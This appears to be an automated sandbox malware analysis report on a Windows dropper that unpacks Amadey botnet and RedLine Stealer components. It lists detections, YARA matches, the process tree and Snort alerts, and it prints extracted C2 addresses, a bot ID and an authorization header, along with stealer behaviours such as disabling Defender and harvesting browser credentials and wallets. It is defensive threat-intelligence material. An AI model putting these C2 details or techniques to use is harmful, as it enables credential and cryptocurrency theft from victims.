Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
21fvBVFMsn.exe

Overview

General Information

Sample Name:21fvBVFMsn.exe
Original Sample Name:478e1c903cfcda85acdb9759ae80e155.exe
Analysis ID:811560
MD5:478e1c903cfcda85acdb9759ae80e155
SHA1:dc03499087dfa49b93fd9ba4b1452d0af8baef46
SHA256:fd0f2580ee525c2fbde7b187b7b385a56e1817a219da7f3c398992a2c784a7d1
Tags:Amadeyexe
Infos:

Detection

Amadey, RedLine
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected RedLine Stealer
Yara detected Amadeys stealer DLL
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Disable Windows Defender real time protection (registry)
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Disable Windows Defender notifications (registry)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Yara detected Credential Stealer
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Found evasive API chain checking for process token information
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Dropped file seen in connection with other malware
Uses Microsoft's Enhanced Cryptographic Provider

Classification

  • System is w10x64
  • 21fvBVFMsn.exe (PID: 3460 cmdline: C:\Users\user\Desktop\21fvBVFMsn.exe MD5: 478E1C903CFCDA85ACDB9759AE80E155)
    • sEm51bM.exe (PID: 3236 cmdline: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exe MD5: EE9CEC71CDD89A723F90D5013E963B02)
      • sMt14vz.exe (PID: 6120 cmdline: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exe MD5: EA0FADAB5F038CDB93F37EA867C62934)
        • ijx54ck.exe (PID: 6108 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exe MD5: 7E93BACBBC33E6652E147E7FE07572A0)
        • kxL91dA.exe (PID: 3228 cmdline: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exe MD5: C9C03EC2426C8416841FD7E93BB9DC3D)
  • rundll32.exe (PID: 5388 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 5188 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • rundll32.exe (PID: 4340 cmdline: C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\ MD5: 73C519F050C20580F8A62C849D49215A)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about 500$ on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": "193.233.20.15/dF30Hn4m/index.php", "Version": "3.67"}
{"C2 url": "193.233.20.17:4139", "Bot Id": "furka", "Authorization Header": "46dae41be0c00464bf56eddcc93e1bec"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exeJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
        C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
          C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
          • 0x1a440:$pat14: , CommandLine:
          • 0x134a9:$v2_1: ListOfProcesses
          • 0x13288:$v4_3: base64str
          • 0x13e01:$v4_4: stringKey
          • 0x11b63:$v4_5: BytesToStringConverted
          • 0x10d76:$v4_6: FromBase64
          • 0x12098:$v4_8: procName
          • 0x1281b:$v5_5: FileScanning
          • 0x11d6c:$v5_7: RecordHeaderField
          • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
          SourceRuleDescriptionAuthorStrings
          00000005.00000000.267575199.00000000004E2000.00000002.00000001.01000000.00000009.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
              00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                  Process Memory Space: kxL91dA.exe PID: 3228JoeSecurity_RedLineYara detected RedLine StealerJoe Security
                    Click to see the 1 entries
                    SourceRuleDescriptionAuthorStrings
                    0.3.21fvBVFMsn.exe.4a8da20.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                      2.3.sMt14vz.exe.49fac20.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                        2.3.sMt14vz.exe.49fac20.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                        • 0x1a440:$pat14: , CommandLine:
                        • 0x134a9:$v2_1: ListOfProcesses
                        • 0x13288:$v4_3: base64str
                        • 0x13e01:$v4_4: stringKey
                        • 0x11b63:$v4_5: BytesToStringConverted
                        • 0x10d76:$v4_6: FromBase64
                        • 0x12098:$v4_8: procName
                        • 0x1281b:$v5_5: FileScanning
                        • 0x11d6c:$v5_7: RecordHeaderField
                        • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                        5.0.kxL91dA.exe.4e0000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                          5.0.kxL91dA.exe.4e0000.0.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                          • 0x1a440:$pat14: , CommandLine:
                          • 0x134a9:$v2_1: ListOfProcesses
                          • 0x13288:$v4_3: base64str
                          • 0x13e01:$v4_4: stringKey
                          • 0x11b63:$v4_5: BytesToStringConverted
                          • 0x10d76:$v4_6: FromBase64
                          • 0x12098:$v4_8: procName
                          • 0x1281b:$v5_5: FileScanning
                          • 0x11d6c:$v5_7: RecordHeaderField
                          • 0x11a34:$v5_9: BCRYPT_KEY_LENGTHS_STRUCT
                          Click to see the 3 entries
                          No Sigma rule has matched
                          Timestamp:193.233.20.17192.168.2.34139496992043234 02/19/23-02:32:23.476854
                          SID:2043234
                          Source Port:4139
                          Destination Port:49699
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.3193.233.20.174969941392043231 02/19/23-02:32:35.640007
                          SID:2043231
                          Source Port:49699
                          Destination Port:4139
                          Protocol:TCP
                          Classtype:A Network Trojan was detected
                          Timestamp:192.168.2.3193.233.20.174969941392043233 02/19/23-02:32:22.070574
                          SID:2043233
                          Source Port:49699
                          Destination Port:4139
                          Protocol:TCP
                          Classtype:A Network Trojan was detected

                          Click to jump to signature section

                          Show All Signature Results

                          AV Detection

                          barindex
                          Source: 21fvBVFMsn.exeReversingLabs: Detection: 76%
                          Source: 21fvBVFMsn.exeVirustotal: Detection: 55%Perma Link
                          Source: 21fvBVFMsn.exeAvira: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeAvira: detection malicious, Label: HEUR/AGEN.1252166
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exeReversingLabs: Detection: 72%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exeVirustotal: Detection: 69%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeReversingLabs: Detection: 69%
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeVirustotal: Detection: 54%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exeReversingLabs: Detection: 46%
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exeVirustotal: Detection: 40%Perma Link
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeReversingLabs: Detection: 69%
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeReversingLabs: Detection: 84%
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeReversingLabs: Detection: 96%
                          Source: 21fvBVFMsn.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\ijx54ck.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\nIp99Jf.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\lbt58JR.exeJoe Sandbox ML: detected
                          Source: C:\Users\user\AppData\Local\Temp\IXP002.TMP\kxL91dA.exeJoe Sandbox ML: detected
                          Source: 1.3.sEm51bM.exe.4756820.0.unpackAvira: Label: TR/Patched.Gen
                          Source: 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: RedLine {"C2 url": "193.233.20.17:4139", "Bot Id": "furka", "Authorization Header": "46dae41be0c00464bf56eddcc93e1bec"}
                          Source: 0.3.21fvBVFMsn.exe.4a8da20.0.unpackMalware Configuration Extractor: Amadey {"C2 url": "193.233.20.15/dF30Hn4m/index.php", "Version": "3.67"}
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A42F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,0_2_00A42F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCode function: 1_2_00322F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,1_2_00322F1D
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCode function: 2_2_010D2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,2_2_010D2F1D
                          Source: 21fvBVFMsn.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: 21fvBVFMsn.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                          Source: Binary string: 0C:\nusegilo zawufeha_koboxuyokefamo\doneni.pdb source: sEm51bM.exe, 00000001.00000003.242054317.0000000004724000.00000004.00000020.00020000.00000000.sdmp, lbt58JR.exe.1.dr
                          Source: Binary string: wextract.pdb source: 21fvBVFMsn.exe, sEm51bM.exe.0.dr, sMt14vz.exe.1.dr
                          Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: 21fvBVFMsn.exe, 00000000.00000003.241383449.0000000002ED4000.00000004.00000020.00020000.00000000.sdmp, 21fvBVFMsn.exe, 00000000.00000003.241227286.0000000004A02000.00000004.00000020.00020000.00000000.sdmp, nIp99Jf.exe.0.dr
                          Source: Binary string: wextract.pdbGCTL source: 21fvBVFMsn.exe, sEm51bM.exe.0.dr, sMt14vz.exe.1.dr
                          Source: Binary string: C:\Users\Admin\source\repos\Healer\Healer\obj\Release\Healer.pdb source: sMt14vz.exe, 00000002.00000003.242565782.00000000049F8000.00000004.00000020.00020000.00000000.sdmp, ijx54ck.exe, 00000003.00000000.242765935.00000000006E2000.00000002.00000001.01000000.00000006.sdmp, ijx54ck.exe.2.dr
                          Source: Binary string: C:\nusegilo zawufeha_koboxuyokefamo\doneni.pdb source: sEm51bM.exe, 00000001.00000003.242054317.0000000004724000.00000004.00000020.00020000.00000000.sdmp, lbt58JR.exe.1.dr
                          Source: C:\Users\user\Desktop\21fvBVFMsn.exeCode function: 0_2_00A42390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00A42390
                          Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\sEm51bM.exeCode function: 1_2_00322390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,1_2_00322390
                          Source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\sMt14vz.exeCode function: 2_2_010D2390 FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,2_2_010D2390

                          Networking

                          barindex
                          Source: TrafficSnort IDS: 2043233 ET TROJAN RedLine Stealer TCP CnC net.tcp Init 192.168.2.3:49699 -> 193.233.20.17:4139
                          Source: TrafficSnort IDS: 2043231 ET TROJAN Redline Stealer TCP CnC Activity 192.168.2.3:49699 -> 193.233.20.17:4139
                          Source: TrafficSnort IDS: 2043234 ET MALWARE Redline Stealer TCP CnC - Id1Response 193.233.20.17:4139 -> 192.168.2.3:49699
                          Source: Malware configuration extractorURLs: 193.233.20.15/dF30Hn4m/index.php
                          Source: Malware configuration extractorURLs: 193.233.20.17:4139
                          Source: Joe Sandbox ViewASN Name: REDCOM-ASRedcomKhabarovskRussiaRU REDCOM-ASRedcomKhabarovskRussiaRU
                          Source: Joe Sandbox ViewIP Address: 193.233.20.17 193.233.20.17
                          Source: global trafficTCP traffic: 192.168.2.3:49699 -> 193.233.20.17:4139
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: unknownTCP traffic detected without corresponding DNS query: 193.233.20.17
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultP
                          Source: kxL91dA.exe, 00000005.00000002.328881291.00000000027B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                          Source: kxL91dA.exe, 00000005.00000002.328881291.000000000283F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
